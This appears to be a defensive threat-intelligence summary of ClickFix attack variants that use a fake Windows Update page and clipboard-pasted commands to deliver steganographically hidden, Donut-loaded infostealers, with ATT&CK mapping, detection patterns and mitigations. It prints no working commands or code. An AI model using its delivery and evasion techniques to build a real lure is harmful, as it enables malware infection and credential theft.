Full Report
New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images. [...]
Analysis Summary
# Tool/Technique: ClickFix Attack Variants (Fake Windows Update Lure)
## Overview
ClickFix is a persistent social-engineering attack that tricks users into pasting and executing malicious commands into the Windows Command Prompt. New variants utilize a highly deceptive lure involving a realistic, full-screen browser page mimicking a Windows Update animation to convince the victim to execute commands that ultimately deploy malware payloads.
## Technical Details
- Type: Attack Framework/Technique (Social Engineering/Delivery Mechanism)
- Platform: Windows
- Capabilities: Execution of arbitrary commands via user input (Copy/Paste), Payload delivery via steganography in images, In-memory execution of shellcode.
- First Seen: Variants observed since at least October 1st (specific variant mentioned).
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Conceptual fit for the initial lure/delivery)
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell
- T1027 - Obfuscated Files or Information
- T1027.001 - Steganography (Used for hiding the final payload)
- T1055 - Process Injection
- T1055.012 - Windows Shellcode Injection (Implied by Donut usage)
## Functionality
### Core Capabilities
- **Deceptive Lure:** Presents a full-screen browser page mimicking a Windows Update installation process or a simple "human verification."
- **Clipboard Hijacking via JavaScript:** Uses JavaScript on the malicious webpage to automatically copy attack commands to the user's clipboard.
- **Forced Execution:** Instructs the user to manually paste and execute these commands in the Command Prompt, leading to the initial stages of deployment.
- **Multi-Stage Execution:** Begins execution using the native Windows binary `mshta.exe` to run malicious JavaScript.
### Advanced Features
- **Steganography Payload Hiding:** The final malware payload is encoded directly within the pixel data of PNG images, relying on specific color channels to reconstruct and decrypt the payload in memory.
- **Stego Loader:** A .NET assembly used to manage the decryption process. It contains an AES-encrypted blob which is the steganographic PNG file holding shellcode.
- **Dynamic Evasion (Ctrampoline):** The entry point function initiates a large chain of thousands of empty function calls (trampolining) to obfuscate the execution flow and evade behavioral analysis.
- **Memory Execution:** Utilizes the **Donut** tool to unpack and execute the extracted shellcode (which can include VBScript, JScript, EXE, DLL files, or .NET assemblies) directly in memory, avoiding traditional file-system detection.
## Indicators of Compromise
- File Hashes: N/A (Payload is memory-resident where possible, specific hashes not provided in the text)
- File Names: N/A (Focus on in-memory execution)
- Registry Keys: `RunMRU` (Monitor for suspicious commands entered via the Run box by users).
- Network Indicators: Domains associated with the fake Windows Update process are noted as still active but the specific C2 destinations for the deployed malware are not listed.
- Behavioral Indicators:
- `explorer.exe` spawning `mshta.exe`.
- PowerShell execution following the initial process chain.
- High entropy/suspicious memory regions indicative of unpacked shellcode (Donut artifact).
## Associated Threat Actors
- Threat actors utilizing the **LummaC2** and **Rhadamanthys** infostealers have been observed deploying this specific ClickFix variant. (Note: Rhadamanthys infrastructure was recently disrupted by law enforcement).
## Detection Methods
- Signature-based detection: Unlikely to succeed against in-memory, dynamically decrypted payloads, though YARA rules could be developed for the Stego Loader's internal AES-encrypted blob structure.
- Behavioral detection: Monitor for unusual process lineage, specifically `explorer.exe` spawning `mshta.exe` or PowerShell processes initiated through user interaction paths.
- YARA rules: Potential for rules targeting the specific structure of the Donut packed shellcode or the custom C# logic used in the Stego Loader.
## Mitigation Strategies
- **User Training:** Emphasize vigilance against unexpected prompts requiring the user to execute commands copied to the clipboard or to interact with browser-based 'security updates.'
- **Disable Windows Run Box:** Restricting the use of the standard Windows Run box (`Win+R`) limits an attacker's ability to leverage accidental user copy/paste actions.
- **Monitoring:** Implement robust monitoring on suspicious process chains, such as `explorer.exe` spawning unexpected file interpreters (`mshta.exe`) or scripting engines (`powershell.exe`).
## Related Tools/Techniques
- LummaC2 (Malware deployed)
- Rhadamanthys (Malware deployed)
- Donut (Payload packing/loader tool)
- Steganography (Payload encoding technique)